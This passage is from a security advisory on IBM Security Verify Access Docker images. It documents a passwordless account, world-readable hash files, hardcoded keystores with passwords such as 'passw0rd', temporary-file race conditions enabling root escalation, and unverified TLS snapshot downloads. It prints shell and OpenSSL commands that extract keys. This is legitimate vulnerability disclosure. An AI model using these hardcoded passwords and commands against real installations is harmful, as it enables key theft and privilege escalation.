admin:admin:19151:0:99999:7:::
cluster:NO PASSWORD:19151:0:99999:7:::

2 password hashes cracked, 0 left

In the live environment, it was confirmed that the user cluster does not have a password in the verify-access instance:

[root@test-server 5ecd09e2d7bb10f3bec5b6be4c2298d6bdb54b70a75ce67944651b6b5330821e]# cat ./merged/etc/shadow | grep cluster
cluster::19151:0:99999:7:::

If a SSH server was installed inside the instances, it would be then possible to login as cluster without a password.

A user with a local access can get cluster privileges.

Details - Non-standard way of storing hashes and world-readable files containing hashes

It was observed that passwords are saved in 3 non-standard files in the Docker image verify-access:

- /etc/shadow.isam
- /etc/admin.pwd
- /etc/wga_notifications.conf

Furthermore, the /etc/shadow.isam and /etc/wga_notifications.conf files are world-readable.

When extracting verify-access, we can find the /etc/shadow.isam file:

kali-docker# cat ./698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/shadow.isam
admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::
www-data:*:14251:0:99999:7:::
ivmgr:!!:19151:0:99999:7:::
cluster::19151:0:99999:7:::
pgresql:!!:19151:0:99999:7:::
nfast:!!:19151:0:99999:7:::
tivoli:!!:19151:0:99999:7:::

When checking on the live system (verify-access), we can find these 3 previous files, 2 of which are world-readable:

[root@container-01]# podman ps | grep 413823e2f7d1
413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                         7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:7443->9443/tcp            verify-access
[root@container-01]#

[root@container-01]# podman ps|grep 413823e2f7d1
413823e2f7d1  ibmcom/verify-access/verify-access/10.0.4.0:20220926.6                         25 hours ago  Up 25 hours ago (healthy)  0.0.0.0:7443->9443/tcp            verify-access
[root@container-01]# podman exec -it  413823e2f7d1 ls -la /etc/wga_notifications.conf /etc/shadow.isam /etc/admin.pwd
-rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd
-rw-r--r-- 1 root root 305 Jun  8 13:43 /etc/shadow.isam
-rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf
[root@container-01]#

Furthermore, we can extract passwords from these files. The hash in /etc/shadow.isam seems to be hardcoded (admin):

[root@container-01]# podman exec -it 413823e2f7d1 cat /etc/shadow.isam
admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::
www-data:*:14251:0:99999:7:::
ivmgr:!!:19151:0:99999:7:::
cluster::19151:0:99999:7:::
pgresql:!!:19151:0:99999:7:::
nfast:!!:19151:0:99999:7:::
tivoli:!!:19151:0:99999:7:::

[root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/admin.pwd
-rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd
[root@container-01]# podman exec -it 413823e2f7d1 cat /etc/admin.pwd
[REDACTED]

[root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/wga_notifications.conf
-rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf
[root@container-01]# podman exec -it 413823e2f7d1 cat /etc/wga_notifications.conf
[...]
sam_cluster.hvdb.driver_type = thin
isam_cluster.hvdb.embedded = false
isam_cluster.hvdb.port = 1536
isam_cluster.hvdb.pwd = [REDACTED]
isam_cluster.hvdb.secure = false
[...]

A local attacker can extract hashes from world-readable files and elevate its privileges.

The use of /etc/shadow.isam is unknown.

Details - Hardcoded PKCS#12 files

It was observed the Docker image verify-access contains hardcoded PKCS#12 files:

- /var/isam/cluster/sundry/odbc/ewallet.p12
- /var/pdweb/shared/keytab/lmi_trust_store.p12
- /var/pdweb/shared/keytab/embedded_ldap_keys.p12
- /var/pdweb/shared/keytab/rt_profile_keys.p12

The /var/isam/cluster/sundry/odbc/ewallet.p12 file can be found inside the verify-access image:

kali-docker# ls -la ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12
-rw-r--r-- 1 5000 5000 736 Jun  8 01:32 ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12

kali-docker# sha256sum ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12
687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5  ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12

When checking on the live system (verify-access), we can find this unchanged file:

[root@container-01]# podman ps | grep 413823e2f7d1
413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                         26 hours ago  Up 26 hours ago (healthy)  0.0.0.0:7443->9443/tcp            verify-access
[root@container-01]# podman exec -it 413823e2f7d1 ls -la /var/isam/cluster/sundry/odbc/
total 16
drwxr-xr-x 2 www-data www-data 4096 Jun  8 13:43 . 
drwxr-xr-x 3 cluster  cluster  4096 Jun  8 13:43 .. 
-rw-r--r-- 1 www-data www-data  781 Jun  8 13:32 cwallet.sso
-rw-r--r-- 1 www-data www-data    0 Jun  8 13:32 cwallet.sso.lck
-rw-r--r-- 1 www-data www-data  736 Jun  8 13:32 ewallet.p12
-rw-r--r-- 1 www-data www-data    0 Jun  8 13:32 ewallet.p12.lck
[root@container-01]# podman exec -it 413823e2f7d1 sha256sum /var/isam/cluster/sundry/odbc/ewallet.p12
687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5  /var/isam/cluster/sundry/odbc/ewallet.p12
[root@container-01]#

This file is used by several programs, with a trivial password (passw0rd) to encrypt it:

Assembly code of the function authorSqlFuseFiles found inside mesa_config, used to extract ewallet.p12:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Extraction using OpenSSL:

kali-docker# openssl pkcs12 -in ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12 -out /tmp/ewallet.test        
Enter Import Password: [passw0rd]
kali-docker# cat /tmp/ewallet.test
Bag Attributes
    localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 04 
subject=C = us, O = ibm, CN = rhel66.home.com
issuer=C = us, O = ibm, CN = rhel66.home.com
-----BEGIN CERTIFICATE-----
MIIB2TCCAUICAQAwDQYJKoZIhvcNAQEEBQAwNTELMAkGA1UEBhMCdXMxDDAKBgNV
BAoTA2libTEYMBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMB4XDTE2MDYwNDE4MjAx
N1oXDTI2MDYwMjE4MjAxN1owNTELMAkGA1UEBhMCdXMxDDAKBgNVBAoTA2libTEY
MBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQC5awQOrQ/BlLYQ1dC0+e2NplzULT447UNrj8yaPqH0FeoqgLH29FzpVJV1
IWzN06IGSUEeyAck7u7EUg1BK3eyfwO3o1qolrvRkm4Rsvg+yijUIr2aSV0Xz9oR
71C+YMHr1MtGi6Xn432+vPSc2AxQVBKCVj0rBGka6V9mwWDPewIDAQABMA0GCSqG
SIb3DQEBBAUAA4GBAF9QlpGUC9QcxgI0B77xY0/2bNd3xBfS+hTbgyyoWRzH43so
1VG97F6g0rR6wvsAOTdr7kJn+t7sMyuhdJ2/TmZFATUL+6j9XpJH+7r+Ca4iIMB+
ysi09PVz6ccrsgpD9SiYxQ4HMJ+YKBahPg3geEUIkratxB69qZy0uP5WSp64
-----END CERTIFICATE-----
kali-docker# openssl x509 -in /tmp/ewallet.test -text -noout                                                                                                                              
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 0 (0x0)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C = us, O = ibm, CN = rhel66.home.com
        Validity
            Not Before: Jun  4 18:20:17 2016 GMT
            Not After : Jun  2 18:20:17 2026 GMT
        Subject: C = us, O = ibm, CN = rhel66.home.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:b9:6b:04:0e:ad:0f:c1:94:b6:10:d5:d0:b4:f9:
                    ed:8d:a6:5c:d4:2d:3e:38:ed:43:6b:8f:cc:9a:3e:
                    a1:f4:15:ea:2a:80:b1:f6:f4:5c:e9:54:95:75:21:
                    6c:cd:d3:a2:06:49:41:1e:c8:07:24:ee:ee:c4:52:
                    0d:41:2b:77:b2:7f:03:b7:a3:5a:a8:96:bb:d1:92:
                    6e:11:b2:f8:3e:ca:28:d4:22:bd:9a:49:5d:17:cf:
                    da:11:ef:50:be:60:c1:eb:d4:cb:46:8b:a5:e7:e3:
                    7d:be:bc:f4:9c:d8:0c:50:54:12:82:56:3d:2b:04:
                    69:1a:e9:5f:66:c1:60:cf:7b
                Exponent: 65537 (0x10001)
    Signature Algorithm: md5WithRSAEncryption
    Signature Value:
        5f:50:96:91:94:0b:d4:1c:c6:02:34:07:be:f1:63:4f:f6:6c:
        d7:77:c4:17:d2:fa:14:db:83:2c:a8:59:1c:c7:e3:7b:28:d5:
        51:bd:ec:5e:a0:d2:b4:7a:c2:fb:00:39:37:6b:ee:42:67:fa:
        de:ec:33:2b:a1:74:9d:bf:4e:66:45:01:35:0b:fb:a8:fd:5e:
        92:47:fb:ba:fe:09:ae:22:20:c0:7e:ca:c8:b4:f4:f5:73:e9:
        c7:2b:b2:0a:43:f5:28:98:c5:0e:07:30:9f:98:28:16:a1:3e:
        0d:e0:78:45:08:92:b6:ad:c4:1e:bd:a9:9c:b4:b8:fe:56:4a:
        9e:b8

The other files have been decrypted using IBM Crypto For C and OpenSSL.

The lmi_trust_store.p12 file in the verify-access image contains several CAs and will also include the hardcoded key for the Isam CA in a live instance (after configuration):

kali-docker# file=ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/pdweb/shared/keytab/lmi_trust_store.p12
kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw passwordpassword

kali-docker# openssl pkcs12 -in /tmp/tmp.p12 -info -passin pass:passwordpassword
MAC: sha1, Iteration 1024
MAC length: 20, salt length: 8
PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024
Certificate bag
Bag Attributes
    friendlyName: CN=DigiCert Global Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US
    localKeyID: 03 82 01 01 00 CB 9C 37 AA 48 13 12 0A FA DD 44 9C 4F 52 B0 F4 DF AE 04 F5 79 79 08 A3 24 18 FC 4B 2B 84 C0 2D B9 D5 C7 FE F4 C1 1F 58 CB B8 6D 9C 7A 74 E7 98 29 AB 11 B5 E3 70 A0 A1 CD 4C 88 99 93 8C 91 70 E2 AB 0F 1C BE 93 A9 FF 63 D5 E4 07 60 D3 A3 BF 9D 5B 09 F1 D5 8E E3 53 F4 8E 63 FA 3F A7 DB B4 66 DF 62 66 D6 D1 6E 41 8D F2 2D B5 EA 77 4A 9F 9D 58 E2 2B 59 C0 40 23 ED 2D 28 82 45 3E 79 54 92 26 98 E0 80 48 A8 37 EF F0 D6 79 60 16 DE AC E8 0E CD 6E AC 44 17 38 2F 49 DA E1 45 3E 2A B9 36 53 CF 3A 50 06 F7 2E E8 C4 57 49 6C 61 21 18 D5 04 AD 78 3C 2C 3A 80 6B A7 EB AF 15 14 E9 D8 89 C1 B9 38 6C E2 91 6C 8A FF 64 B9 77 25 57 30 C0 1B 24 A3 E1 DC E9 DF 47 7C B5 B4 24 08 05 30 EC 2D BD 0B BF 45 BF 50 B9 A9 F3 EB 98 01 12 AD C8 88 C6 98 34 5F 8D 0A 3C C6 E9 D5 95 95 6D DE 
    2.16.840.1.113894.746875.1.1: <Unsupported tag 6>
subject=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA
issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA
-----BEGIN CERTIFICATE-----
MIIDrzCCApegAwIBAgIQCDvgVpBCRrGhdWrJWZHHSjANBgkqhkiG9w0BAQUFADBh
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD
QTAeFw0wNjExMTAwMDAwMDBaFw0zMTExMTAwMDAwMDBaMGExCzAJBgNVBAYTAlVT
MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j
b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IENBMIIBIjANBgkqhkiG
9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4jvhEXLeqKTTo1eqUKKPC3eQyaKl7hLOllsB
CSDMAZOnTjC3U/dDxGkAV53ijSLdhwZAAIEJzs4bg7/fzTtxRuLWZscFs3YnFo97
nh6Vfe63SKMI2tavegw5BmV/Sl0fvBf4q77uKNd0f3p4mVmFaG5cIzJLv07A6Fpt
43C/dxC//AH2hdmoRBBYMql1GNXRor5H4idq9Joz+EkIYIvUX7Q6hL+hqkpMfT7P
T19sdl6gSzeRntwi5m3OFBqOasv+zbMUZBfHWymeMr/y7vrTC0LUq7dBMtoM1O/4
gdW7jVg/tRvoSSiicNoxBN33shbyTApOB6jtSj1etX+jkMOvJwIDAQABo2MwYTAO
BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUA95QNVbR
TLtm8KPiGxvDl7I90VUwHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUw
DQYJKoZIhvcNAQEFBQADggEBAMucN6pIExIK+t1EnE9SsPTfrgT1eXkIoyQY/Esr
hMAtudXH/vTBH1jLuG2cenTnmCmrEbXjcKChzUyImZOMkXDiqw8cvpOp/2PV5Adg
06O/nVsJ8dWO41P0jmP6P6fbtGbfYmbW0W5BjfIttep3Sp+dWOIrWcBAI+0tKIJF
PnlUkiaY4IBIqDfv8NZ5YBberOgOzW6sRBc4L0na4UU+Krk2U886UAb3LujEV0ls
YSEY1QSteDwsOoBrp+uvFRTp2InBuThs4pFsiv9kuXclVzDAGySj4dzp30d8tbQk
CAUw7C29C79Fv1C5qfPrmAESrciIxpg0X40KPMbp1ZWVbd4=
-----END CERTIFICATE-----
Certificate bag
Bag Attributes
    friendlyName: CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US
[...]

When auditing live installations, the decrypted lmi_trust_store.p12 file will contain the private key of the isam CA.

kali% openssl x509 -in crt.pem -text -noout -modulus
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 14004578023842938
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C = us, O = ibm, CN = isam
        Validity
            Not Before: Sep 19 07:01:51 2022 GMT
            Not After : Sep 17 07:01:51 2032 GMT
        Subject: C = us, O = ibm, CN = isam
[...]
Modulus=C8B3[REDACTED]

kali% openssl rsa -in crt.key -modulus               
Enter pass phrase for crt.key:
Modulus=C8B3[REDACTED]
writing RSA key
-----BEGIN PRIVATE KEY-----
[REDACTED]
-----END PRIVATE KEY-----

It is also possible to decrypt the embedded_ldap_keys.p12 file:

kali-docker# openssl pkcs12 -in embedded_ldap_keys.p12 -info -passin pass:passwordpassword 
MAC: sha1, Iteration 1024       
MAC length: 20, salt length: 8
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 5
Bag Attributes
    friendlyName: server
    localKeyID: [REDACTED]
Key Attributes: <No Attributes>
Enter PEM pass phrase: [password]
Verifying - Enter PEM pass phrase: [password]
-----BEGIN ENCRYPTED PRIVATE KEY-----
[REDACTED]
-----END ENCRYPTED PRIVATE KEY-----
PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024
Certificate bag
Bag Attributes
    friendlyName: server
    localKeyID: [REDACTED]
subject=C = us, O = ibm, CN = isam
issuer=C = us, O = ibm, CN = isam
-----BEGIN CERTIFICATE-----
[REDACTED]
-----END CERTIFICATE-----
kali-docker#

Using a dynamic analysis, it was confirmed that several private keys are included in the snapshot images and used at least by OpenLDAP. The .p12 files can be decrypted using IBM Crypto For C and OpenSSL.

kali-docker# pwd                                            
/home/user/snapshots/_a22547c15c88-verify-access-runtime_10.0.4.0.tar-default.snapshot/var/pdweb/shared/keytab
kali-docker# ls -la
total 492
drwxr-x---  2 root root   4096 Oct 18 05:13 . 
drwxr-x--- 16 root root   4096 Sep 20 03:01 .. 
-rw-r-----  1 root root   2952 Sep 20 03:01 embedded_ldap_keys.p12
-rw-r-----  1 root root    193 Jun  8 01:31 embedded_ldap_keys.sth
-rw-r-----  1 root root  47630 Sep 20 03:09 lmi_trust_store.p12
-rw-r-----  1 root root    193 Jun  8 01:31 lmi_trust_store.sth
-rw-r-----  1 root root 109313 Sep 20 03:17 rt_profile_keys.p12
-rw-r-----  1 root root    193 Jun  8 01:31 rt_profile_keys.sth
[...]

Details - Incorrect permissions in verify-access-dsc (race condition and leak of private key)

It was observed that the Docker image verify-access-dsc uses insecure temporary files to store sensitive information.

The /usr/sbin/bootstrap.sh script will generate temporary files using the default umask (022).

In the build_health_check_config() function found inside the /usr/sbin/bootstrap.sh script (executed when the instance starts), we can see that several files are generated:

- /tmp/health_check.p12
- /var/dsc/.health/port.txt

Content of /usr/sbin/bootstrap.sh:

[code:shell] 65 ############################################################################# 66 # Construct the health check configuration information. This will include 67 # the port and client certificate information. 68 69 build_health_check_config() 70 { 71 if [ -z "$INSTANCE" ] ; then 72 INSTANCE=1 73 fi 74 75 conf=/var/dsc/etc/dsc.conf.${INSTANCE} 76 77 if [ ! -f ${conf} ] ; then 78 Echo 973 "${INSTANCE}" 79 exit 1 80 fi 81 82 # 83 # Determine the port which is to be used. 84 # 85 86 port=/opt/PolicyDirector/sbin/pdconf -f $conf getentry \ 87 dsess-server ssl-listen-port 88 89 mkdir -p /var/dsc/.health 90 91 echo $port > /var/dsc/.health/port.txt 92 93 # 94 # Extract the client certificate which is used to communicate with the 95 # server. 96 # 97 98 cert_file=/var/dsc/.health/health_check.pem 99 100 tmp_p12=/tmp/health_check.p12 101 tmp_pwd=health_check 102 103 # Work out the name of the key file which is being used. 104 key_file=/opt/PolicyDirector/sbin/pdconf -f $conf getentry \ 105 dsess-server ssl-keyfile 106 107 # Export the key into a key database type which is supported 108 # by OpenSSL. 109 gsk8capicmd_64 -cert -export -db $key_file -stashed \ 110 -target $tmp_p12 -target_pw $tmp_pwd 111 112 # Convert the key into something that curl understands. 113 openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \ 114 -passin pass:$tmp_pwd 2>/dev/null 115 116 # Tidy up. 117 rm -f $tmp_p12 118 } 119 [...] 176 # 177 # Extract the health check information. 178 # 179 180 build_health_check_config [/code]

The temporary file /tmp/health_check.p12 contains the private keys of the dsc server and the dsc client. This key file is stored using the 644 permissions allowing any local attacker to extract these keys when the Docker image starts.

Furthermore, the password of the certificate file is hardcoded (to health_check, on line 101).

When checking the files generated by this script, we can confirm the files are world-readable. For example, for the /var/dsc/.health/port.txt file, the permissions are 644:

[isam@verify-access-dsc /]$ ls -la /var/dsc/.health/
total 28
drwxr-xr-x 2 isam isam 4096 Oct  4 09:07 . 
drwxrwx--- 1 isam root 4096 Oct  4 09:07 ..     
-rw------- 1 isam isam 9268 Oct  4 09:07 health_check.pem
-rw-r--r-- 1 isam isam    5 Oct  4 09:07 port.txt
[isam@verify-access-dsc /]$

There is a race condition in the /usr/sbin/bootstrap.sh script allowing a local attacker with access to the verify-access-dsc instance to extract the private keys of the dsc server and the dsc client when the Docker image starts.

The filename is predictable, allowing a local attacker to create the destination file before the script is executed. The content of the destination file will be overwritten by the /usr/sbin/health_check.sh script but the ownership of the file will still belong to an attacker, allowing extracting the private keys.

The password is hardcoded.

Insecure permissions are used for sensitive files.

Details - Insecure health_check.sh script in verify-access (race condition and leak of private key)

It was observed that the Docker image verify-access runs regularly the script /usr/sbin/health_check.sh.

This script uses a temporary file to store sensitive information. Since this script uses the default umask (022), an attacker can exploit a race condition (between the lines 91 and 95) to extract the private keys of the dsc server and the dsc clients.

The /tmp/health_check.pem output file will also be created containing the private keys in clear-text (in line 91), allowing an attacker to extract these private keys:

Content of /usr/sbin/health_check.sh:

[code:shell] [...] 65 cert_file=/tmp/health_check.pem 66 67 trap "rm -f $result_file $error_file $hdr_file" EXIT 68 69 # The following function will extract a key which can be used to authenticate 70 # to the DSC. 71 72 extract_dsc_key() 73 { 74 if [ ! -f $cert_file ] ; then 75 tmp_p12=/tmp/health_check.p12.$$ 76 tmp_pwd=health_check 77 78 # Work out the name of the DSC configuration file. 79 conf_file=mesa_config wga.ftype dir dsc.conf -production 80 81 # Work out the name of the key file which is being used. 82 key_file=/opt/PolicyDirector/sbin/pdconf -f $conf_file getentry \ 83 dsess-server ssl-keyfile 84 85 # Export the key into a key database type which is supported 86 # by OpenSSL. 87 gsk8capicmd_64 -cert -export -db $key_file -stashed \ 88 -target $tmp_p12 -target_pw $tmp_pwd 89 90 # Convert the key into something that curl understands. 91 openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \ 92 -passin pass:$tmp_pwd 2>/dev/null 93 94 # Tidy up. 95 rm -f $tmp_p12 96 fi 97 } [...] [/code]

The file /tmp/health_check.p12.$$ ($$ corresponding to the local PID) will be generated with the password health_check and will contain the private keys of the dsc client and the dsc server. This file will be world-readable. Then the file will be erased.

There is a race condition in the /usr/sbin/health_check.sh script allowing a local attacker with access to the verify-access instance to extract the private keys of the dsc server and the dsc client.

The filename is predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination file will be overwritten by the /usr/sbin/health_check.sh script but the ownership of the file will still belong to an attacker, allowing extracting the private keys.

There is also a leak of private keys in the world-readable file /tmp/health_check.pem.

The password is hardcoded.

Insecure permissions are used for sensitive files.

Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)

It was observed that the Docker image verify-access regularly runs the script /usr/sbin/health_check.sh.

This script uses curl, without checking the remote SSL certificate:

Content of /usr/sbin/health_check.sh:

[code:shell] 190 # 191 # Make the curl request. 192 # 193 194 eval curl --insecure --output $result_file --silent --show-error \ 195 -D $hdr_file $extra_args https://127.0.0.1:$port 2> $error_file 196 [/code]

The eval instruction does not seem exploitable.

This script uses 2 temporary files to store the standard output (stdout) and the error output (stderr) of the curl command: an attacker can exploit these 2 temporary files to overwrite any file in the filesystem using pre-generated symbolic links inside /tmp:

Content of /usr/sbin/health_check.sh:

[code:shell] 62 result_file=/tmp/health_check.out.$$ 63 error_file=/tmp/health_check.err.$$ [...] 194 eval curl --insecure --output $result_file --silent --show-error \ 195 -D $hdr_file $extra_args https://127.0.0.1:$port 2> $error_file [/code]

The /tmp/health_check.out.$$ file ($$ corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root.

The /tmp/health_check.err.$$ file ($$ corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root.

The script trusts any insecure HTTPS server, due to the use of the --insecure flag in curl.

There are two uses of insecure files in the /usr/sbin/health_check.sh script allowing a local attacker with access to the verify-access instance to overwrite any file as root - it is possible to get a Local Privilege Escalation as root.

The filenames are predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination files will be overwritten by the /usr/sbin/health_check.sh script.

Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)

It was observed that the Docker image verify-access-sc runs regularly the script /usr/sbin/health_check.sh.

This script uses a temporary file to store errors: an attacker can exploit a race condition to overwrite any file in the filesystem using a pre-generated symbolic link.

Furthermore, the script uses insecure options for curl on line 73 (--insecure) - the SSL certificate of the remote host will not be validated:

Content of /usr/sbin/health_check.sh:

[code:shell] 62 # 63 # Test access to the server as this will govern whether we are healthy or 64 # not. 65 # 66 67 error_file=/tmp/health_check.err.$$ 68 69 trap "rm -f $error_file" EXIT 70 71 ping_body='0' 72 73 curl -s -o /dev/null --show-error --insecure --cert $cert_file -X POST \ 74 -H 'SOAPAction: "ping"' \ 75 --data "$ping_body" \ 76 https://127.0.0.1:$port 2> $error_file 77 78 if [ $? -ne 0 ] ; then 79 # 80 # We don't know for sure yet whether the DSC is alive or not because it 81 # could be passive (only a single DSC is active in an environment at any 82 # one time). So, we also need to try a simple SSL connection before we 83 # return that the server is actually unhealthy. We could have simply 84 # avoided the initial curl call, but by only performing the SSL connection 85 # test when the DSC is passive we avoid SSL error messages being displayed 86 # on the console. 87 # 88 89 openssl s_client -connect 127.0.0.1:$port 2>&1 | grep -q CONNECTED 90 91 if [ $? -eq 0 ] ; then 92 exit 0 93 fi 94 95 echo "Error> failed to connect to the service." 96 97 cat $error_file; rm -f $cert_file [/code]

The /tmp/health_check.err.$$ file ($$ corresponding to the local PID) can be a symbolic link that will be followed in the line 76. This allows an attacker to overwrite any file on the system because curl is executed as root.

There is a race condition in the /usr/sbin/health_check.sh script allowing a local attacker to overwrite any file as root on the instance - it is possible to get a Local Privilege Escalation as root.

The filename is predictable, allowing a local attacker to create potential destination files. The content of the destination file will be overwritten by the stderr file descriptor of the curl command.

Details - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp

It was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp are able to download the snapshot file over HTTPS without checking the SSL certificate of the remote server, allowing an attacker to MITM the connection and retrieve the snapshot file or to provide a malicious snapshot file to the system.

The /usr/sbin/.bootstrap_common.sh script is executed from the /usr/sbin/bootstrap.sh script when the instance starts:

Content of /usr/sbin/bootstrap.sh in verify-access-dsc

[code:shell] 139 # 140 # Wait for the snapshot file. 141 # 142 143 wait_for_snapshot [/code]

In verify-access-runtime, the function wait_for_snapshot() is called on line 93 inside the /usr/sbin/bootstrap.sh script.

The function wait_for_snapshot() calls the function download_from_cfgsvc() (line 251):

Content of /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell] 240 ############################################################################# 241 # Wait for the snapshot file. 242 243 wait_for_snapshot() 244 { 245 download_from_cfgsvc 1 246 247 if [ ! -f $snapshot ] ; then 248 Echo 969 249 250 while [ ! -f $snapshot ] ; do 251 download_from_cfgsvc 0 252 253 if [ ! -f $snapshot ] ; then 254 sleep 1 255 fi 256 done 257 258 Echo 970 259 fi 260 } [/code]

And the function download_from_cfgsvc() uses curl to download a snapshot, without checking the SSL certificate of the remote server. The -k option (also known as --insecure) disables any SSL verification (line 154):

Content /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell] 140 download_from_cfgsvc() 141 { 142 # No need to download the snapshot if the configuration service has not 143 # been defined. 144 if [ -z "$CONFIG_SERVICE_URL" ] ; then 145 return 146 fi 147 148 if [ $1 -eq 1 ] ; then 149 Echo 960 150 fi 151 152 snapshotUri="basename $snapshot?type=File&client=cat /etc/hostname" 153 154 curl -k -s --fail -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \ 155 "$CONFIG_SERVICE_URL/snapshots/$snapshotUri" \ 156 -o $snapshot 157 158 if [ $? -ne 0 ] ; then 159 if [ $1 -eq 1 ] ; then 160 Echo 961 161 fi 162 163 rm -f $snapshot 164 else 165 Echo 962 166 fi 167 } [/code]

From the curl(1) man page:

   -k, --insecure
          (TLS) By default, every SSL connection curl makes is verified to
          be secure. This option allows curl to proceed and operate even
          for server connections otherwise considered insecure.

          The server connection is verified by making sure the server's
          certificate contains the right name and verifies successfully
          using the cert store.

          See this online resource for further details:
           https://curl.haxx.se/docs/sslcerts.html

          See also --proxy-insecure and --cacert.

The same issue exists with the function download_fixpacks() in the same shell script (line 201):

Content of /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell] 169 ############################################################################# 170 # Attempt to download any requested fixpacks from the configuration service. 171 172 download_fixpacks() 173 { 174 # No need to download the fixpacks if the configuration service has not 175 # been defined. 176 if [ -z "$CONFIG_SERVICE_URL" ] ; then 177 return 178 fi 179 180 # No need to download the fixpacks if no fixpack has been specified, or 181 # if the fixpack has been set to 'disabled'. 182 if [ -z "${FIXPACKS}" -o "${FIXPACKS}" = "disabled" ]; then 183 return 184 fi 185 186 # Set the fixpack directory, and then ensure that the fixpack directory 187 # has been created. 188 fixpack_dir=/tmp/fixpacks 189 190 if [ -d $fixpack_dir ] ; then 191 rm -rf $fixpack_dir/* 192 else 193 mkdir -p $fixpack_dir 194 fi 195 196 # If we get this far we know that one or more fixpacks have been specified. 197 # We need to download each of these now. 198 for fixpack in $FIXPACKS; do 199 fixpackUri="$fixpack?type=File&client=cat /etc/hostname" 200 201 curl -k -s --fail \ 202 -u 